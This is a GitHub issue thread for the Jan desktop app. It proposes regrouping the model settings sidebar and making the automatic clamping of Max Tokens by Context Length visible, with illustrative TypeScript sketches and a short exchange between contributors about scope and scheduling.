
enhancement: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship #3738

Open
imtuyethan opened this issue Sep 29, 2024 · 3 comments
Assignees
Labels
category: model settings Inference params, presets, templates category: threads & chat Threads & chat UI UX issues needs designs Needs designs type: enhancement Improves a current feature

Comments

@imtuyethan
Contributor

imtuyethan commented Sep 29, 2024

Problem Statement

Currently, changing the Context Length automatically adjusts the Max Tokens value, which can lead to unexpected behavior and confusion. The relationship between these two settings is not immediately clear, and users may unintentionally reduce their Max Tokens without realizing it. This can result in shortened, truncated replies that users may perceive as a bug or poor software design.

  • Settings organization lacks a clear hierarchy
  • Some related settings are separated from each other
  • Technical settings are mixed with basic ones, which results in everyday users breaking their model settings
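
The coupling described above can be sketched as a simple clamping rule. This is a minimal illustrative sketch, not Jan's actual implementation; the `ModelCapacity` interface and `applyContextLength` function are hypothetical names:

```typescript
// Hypothetical sketch of the Context Length / Max Tokens coupling.
// These names are illustrative, not Jan's real code.
interface ModelCapacity {
  contextLength: number; // total tokens the model can attend to
  maxTokens: number;     // tokens reserved for the generated reply
}

// When Context Length is lowered, Max Tokens cannot exceed it, so it is
// silently clamped down -- the surprising behavior this issue describes.
function applyContextLength(
  settings: ModelCapacity,
  newContextLength: number
): ModelCapacity {
  return {
    contextLength: newContextLength,
    maxTokens: Math.min(settings.maxTokens, newContextLength),
  };
}

// Example: dropping Context Length from 8192 to 2048 also drags
// Max Tokens down from 4096 to 2048, with no visible warning.
const before: ModelCapacity = { contextLength: 8192, maxTokens: 4096 };
const after = applyContextLength(before, 2048);
```

Because the clamp happens implicitly, a user who later raises Context Length back up does not get their old Max Tokens value restored, which compounds the confusion.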

Proposed Changes

  • Group related settings together
  • Order settings from basic to advanced
  • Make the Context Length and Max Tokens relationship clearer by placing them next to each other
  • Separate technical settings from common ones
1. Model Selection
   - Model dropdown

2. Model Capacity
   - Context Length
   - Max Tokens
   - Number of GPU layers (ngl)

3. Response Control 
   - Temperature
   - Top P
   - Stream
   - Frequency Penalty
   - Presence Penalty
   - Stop

4. Advanced Settings
   - Prompt template
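
The grouping above could be represented as a small declarative schema that drives the sidebar rendering. This is a hypothetical sketch; the `settingsSections` structure and setting keys are illustrative, not Jan's actual config:

```typescript
// Hypothetical declarative layout for the proposed sidebar hierarchy.
// Section and setting names mirror the list above; keys are illustrative.
interface SettingsSection {
  title: string;
  settings: string[]; // setting keys rendered in order within the section
}

const settingsSections: SettingsSection[] = [
  { title: "Model Selection", settings: ["model"] },
  // Context Length and Max Tokens sit side by side so the clamping
  // relationship between them is visible at a glance.
  { title: "Model Capacity", settings: ["contextLength", "maxTokens", "ngl"] },
  {
    title: "Response Control",
    settings: [
      "temperature",
      "topP",
      "stream",
      "frequencyPenalty",
      "presencePenalty",
      "stop",
    ],
  },
  { title: "Advanced Settings", settings: ["promptTemplate"] },
];
```

Driving the UI from a schema like this would keep the reorganization purely presentational, matching the note below that no underlying settings values change.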
   

Figma link: https://www.figma.com/design/DYfpMhf8qiSReKvYooBgDV/Jan-App-(3rd-version)?node-id=8930-46312&t=bJX9XIK7iffILBnO-4

[Screenshot: proposed sidebar settings hierarchy, 2024-11-05]

By rearranging the settings like this, we could:

  • Let users directly see how the Max Tokens ceiling changes when they adjust Context Length
  • Improve users' understanding of the settings
  • Reduce confusion about the Context Length/Max Tokens relationship
  • Make settings discovery more intuitive

Notes:

  • Keep existing functionality
  • Only reorganize UI layout
  • No changes to underlying settings values
@imtuyethan imtuyethan added the type: enhancement Improves a current feature label Sep 29, 2024
@github-project-automation github-project-automation bot moved this to Triage in Menlo Sep 29, 2024

@freelerobot freelerobot added the category: threads & chat Threads & chat UI UX issues label Oct 14, 2024
@freelerobot
Contributor

freelerobot commented Oct 14, 2024

Related #3796

Let's keep it simple. The current feature idea is too complex

@freelerobot freelerobot added the category: model settings Inference params, presets, templates label Oct 15, 2024
@imtuyethan imtuyethan changed the title idea: Improve Context Length and Max Tokens UX idea: [UX enhancement] Improve Context Length and Max Tokens UX Oct 17, 2024
@imtuyethan
Contributor Author

> Related #3796
>
> Let's keep it simple. The current feature idea is too complex

I don't think this is related to #3796.

This is purely about how changing Context Length affects Max Tokens: users are not well informed about the change, and the UX could be improved. Let's move this to Planning sprint 25?

@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve Context Length and Max Tokens UX idea: [UX enhancement] Improve Context Length and Max Tokens Settings UX Oct 18, 2024
@imtuyethan imtuyethan self-assigned this Nov 4, 2024
@imtuyethan imtuyethan moved this from Investigating to Scheduled in Menlo Nov 4, 2024
@imtuyethan imtuyethan added the needs designs Needs designs label Nov 4, 2024
@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve Context Length and Max Tokens Settings UX idea: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship Nov 5, 2024
@imtuyethan imtuyethan moved this from Scheduled to Icebox in Menlo Jan 20, 2025
@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship enhancement: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship Jan 20, 2025
Projects
Status: Icebox
Development

No branches or pull requests

2 participants